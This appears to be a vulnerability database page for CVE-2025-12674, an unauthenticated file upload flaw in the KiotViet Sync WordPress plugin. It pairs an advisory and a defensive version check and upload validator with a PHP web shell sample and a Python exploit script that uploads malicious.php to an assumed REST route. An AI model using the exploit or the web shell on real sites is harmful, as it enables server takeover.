Security Vulnerability Report
CVE-2025-12674 CVSS 9.8 CRITICAL

CVE-2025-12674

Published: 2025-11-05 08:15:33
Last Modified: 2026-04-15 00:35:42

Description

The KiotViet Sync plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the create_media() function in all versions up to, and including, 1.8.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

Weakness class: CWE-434 (Unrestricted Upload of File with Dangerous Type). The CVSS vector (AV:N, PR:N, UI:N) confirms the practical reading of the description: the upload is reachable over the network with no credentials and no user interaction, so any site running 1.8.5 or earlier should be treated as exploitable by anyone who can reach it. Whether an upload turns into code execution depends on where the file lands and whether that location is served with script execution enabled; the advisory does not name a fixed release, so if none is available the interim mitigation is to deactivate the plugin or block its upload route at the web server.
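The two checks a practitioner wants from this advisory, as an added example (this is not code from the KiotViet Sync plugin or from Wordfence): deciding whether an installed version falls in the affected range "up to, and including, 1.8.5", and the kind of server-side file-type validation the description says create_media() lacks. Assumptions: the plugin follows the WordPress.org convention of declaring its version in readme.txt as `Stable tag: X.Y.Z` (the slug `kiotvietsync` comes from the WordPress.org reference); the allow-list validator is an illustration of CWE-434 mitigation, not the vendor's fix; the readme text and upload payloads are constructed inline.

```python
import re

# Added example for CVE-2025-12674; not code from the KiotViet Sync plugin.
# (1) version-range check against the advisory's "<= 1.8.5", and
# (2) an allow-list file-type validator of the kind create_media() is missing.

AFFECTED_MAX = (1, 8, 5)  # highest affected version per the advisory


def parse_version(tag: str) -> tuple:
    """Turn '1.8.5', '1.8' or '1.8.6-beta' into a 3-tuple of ints.
    Parsing stops at the first non-numeric component, so a suffix such as
    '-beta' is ignored; missing components count as 0."""
    parts = []
    for piece in tag.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected(tag: str) -> bool:
    """True when the version is <= 1.8.5, the advisory's affected range."""
    return parse_version(tag) <= AFFECTED_MAX


def stable_tag_from_readme(readme_text: str):
    """WordPress.org plugins publish their version in readme.txt as
    'Stable tag: X.Y.Z'. Assumption: this plugin follows that convention;
    verify against the files actually installed on the host."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme_text, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


# ---- File-type validation of the kind create_media() lacks ----------------

# Allow-list: extension -> (leading magic bytes, MIME type to record).
# Anything not listed is rejected; the client-supplied Content-Type is never used.
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    "png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    "gif":  (b"GIF8", "image/gif"),
    "pdf":  (b"%PDF-", "application/pdf"),
}

# Extensions a PHP-enabled host executes; used for the double-extension check.
EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar"}


def validate_upload(filename: str, content: bytes):
    """Return (ok, detail): on success detail is the MIME type to store,
    on failure the reason. Checks, in order: allow-listed final extension,
    no executable inner extension (shell.php.jpg), magic bytes matching the
    extension, and no embedded PHP open tag as defence in depth."""
    # Strip any client-supplied path; only the basename matters.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "filename must be name.ext"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} is not allowed"
    if set(parts[1:-1]) & EXECUTABLE:
        return False, "executable inner extension"
    magic, mime = ALLOWED[ext]
    if not content.startswith(magic):
        return False, "content does not match extension"
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP code"
    return True, mime


if __name__ == "__main__":
    # Constructed sample readme.txt, not fetched from any site.
    sample_readme = "=== KiotViet Sync ===\nRequires at least: 5.0\nStable tag: 1.8.5\n"
    tag = stable_tag_from_readme(sample_readme)
    print(f"Stable tag {tag}: affected={is_affected(tag)}")
    # Constructed upload attempts: a web shell named as PHP, a double-extension
    # trick, a JPEG/PHP polyglot, and a benign JPEG header.
    shell = b"<?php system($_GET['c']); ?>"
    for fname, data in [
        ("malicious.php", shell),
        ("shell.php.jpg", b"\xff\xd8\xff" + shell),
        ("photo.jpg", b"\xff\xd8\xff\xe0" + shell),
        ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ]:
        print(fname, validate_upload(fname, data))
```

The validator deliberately never reads the multipart Content-Type, because that is exactly the field an attacker controls; the rejection of a correct JPEG header followed by a PHP open tag matters on hosts where the uploads directory is not configured to refuse script execution, which is the condition under which this upload class becomes remote code execution.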

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is recorded for this entry. Affected product, from the description:

KiotViet Sync plugin for WordPress, all versions <= 1.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.

```python
import sys

import requests

# CVE-2025-12674 PoC - Arbitrary File Upload in KiotViet Sync Plugin
# Target: WordPress site with KiotViet Sync plugin <= 1.8.5
#
# Note: the advisory names only the create_media() function; the REST route
# used below is the one this PoC assumes and is not confirmed by the advisory.


def exploit(target_url, file_path):
    """
    Exploit the arbitrary file upload vulnerability in the KiotViet Sync plugin.

    Args:
        target_url: Base URL of the WordPress site
        file_path: Path to the malicious file to upload
    """
    # Read the file to upload
    with open(file_path, 'rb') as f:
        file_content = f.read()

    # Construct the vulnerable endpoint
    endpoint = f"{target_url.rstrip('/')}/wp-json/kiotviet/v1/media"

    # Prepare multipart form data; the server performs no file type validation
    files = {
        'file': ('malicious.php', file_content, 'application/x-php')
    }

    # Send the upload request without any authentication
    try:
        response = requests.post(endpoint, files=files, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

    # WordPress REST handlers answer a successful create with 200 or 201
    if response.status_code in (200, 201):
        try:
            result = response.json()
        except ValueError:
            print("[-] Upload may have succeeded but the response was not JSON:")
            print(response.text)
            return None
        uploaded_url = result.get('url', '')
        print("[+] File uploaded successfully!")
        print(f"[+] Uploaded URL: {uploaded_url}")
        print(f"[+] Access the file to execute code: {uploaded_url}")
        return uploaded_url

    print(f"[-] Upload failed. Status code: {response.status_code}")
    print(f"[-] Response: {response.text}")
    return None


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <malicious_file>")
        print(f"Example: python {sys.argv[0]} http://victim.com /tmp/shell.php")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])
```

References

https://wordpress.org/plugins/kiotvietsync/ (plugin listing on WordPress.org)
https://www.wordfence.com/threat-intel/vulnerabilities/id/7fdd670f-2a71-4c1d-af46-f0fd05352f7e?source=cve (Wordfence advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12674",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2025-11-05T08:15:33.313",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The KiotViet Sync plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the create_media() function in all versions up to, and including, 1.8.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wordpress.org/plugins/kiotvietsync/",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7fdd670f-2a71-4c1d-af46-f0fd05352f7e?source=cve",
        "source": "security@wordfence.com"
      }
    ]
  }
}
```